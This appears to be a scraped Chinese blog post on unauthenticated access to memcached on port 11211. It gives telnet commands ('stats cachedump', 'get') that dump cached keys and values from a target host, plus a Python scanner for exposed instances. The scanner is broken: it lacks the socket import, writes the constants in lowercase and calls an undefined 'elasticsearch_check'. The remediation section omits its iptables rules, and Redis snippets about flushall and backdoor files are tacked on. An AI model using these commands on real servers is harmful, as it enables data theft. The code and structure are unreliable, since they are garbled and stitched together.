memcached 分布式快取系統,預設的 11211 埠不需要密碼即可訪問,黑客直接訪問即可獲取資料庫中所有資訊,造成嚴重的資訊洩露。
0x00 memcache安裝
2、在cmd命令介面)下輸入 'memcached.exe -d install' 進行安裝
3、 啟動 memcached.exe -d start。note: 以後memcached將作為windows的乙個服務每次開機時自動啟動。這樣伺服器端已經安裝完畢了。
0x01 漏洞驗證
telnet 10.9.9.120
無需使用者名稱密碼,可以直接連線memcache 服務的11211埠。
# stats //檢視memcache 服務狀態
# stats items //檢視所有items
# stats cachedump 32 0 //獲得快取key
# get :state:264861539228401373:261588 //通過key讀取相應value ,獲得實際快取內容,造成敏感資訊洩露
0x02 python未授權訪問指令碼
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
def memcache_check(ip, port=11211, timeout=5):
try:
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.af_inet, socket.sock_stream)
s.connect((ip, int(port)))
s.send("stats\r\n")
result = s.recv(1024)
if "stat version" in result:
print '[+] memcache unauthorized: ' +ip+':'+str(port)
except exception, e:
pass
if __name__ == '__main__':
elasticsearch_check("127.0.0.1")
0x03 修復方案:因memcache無許可權控制功能,所以需要使用者對訪問**進行限制。
方案一:
方案二:(注意:請謹慎配置iptables規則)
如果memcache服務需要對外提供服務,則可以通過iptables進行訪問控制,下面是只允許本機訪問:
上述規則的意思是只允許192.168.0.2這個ip對11211埠進行訪問。
最後
windows下的memcache安裝
memcache未授權訪問
memcache是國外社群 live journal的開發團隊開發的高效能的分布式記憶體快取伺服器。一般的使用目的是,通過快取資料庫查詢結果,減少資料庫訪問次數,以提高動態web應用的速度 提高擴充套件性。memcache的預設埠是11211,不需要密碼即可訪問,黑客直接訪問即可獲取資料庫中所有資訊...
Redis未授權訪問漏洞
一 漏洞描述和危害 redis因配置不當可以未授權訪問,被攻擊者惡意利用。攻擊者無需認證訪問到內部資料,可能導致敏感資訊洩露,黑客也可以惡意執行flushall來清空所有資料。攻擊者可通過eval執行lua 或通過資料備份功能往磁碟寫入後門檔案。如果redis以root身份執行,黑客可以給root賬...
Redis未授權訪問漏洞
一 漏洞描述和危害 redis因配置不當可以未授權訪問,被攻擊者惡意利用。攻擊者無需認證訪問到內部資料,可能導致敏感資訊洩露,黑客也可以惡意執行flushall來清空所有資料。攻擊者可通過eval執行lua 或通過資料備份功能往磁碟寫入後門檔案,如果redis以root身份執行,黑客可以給root賬...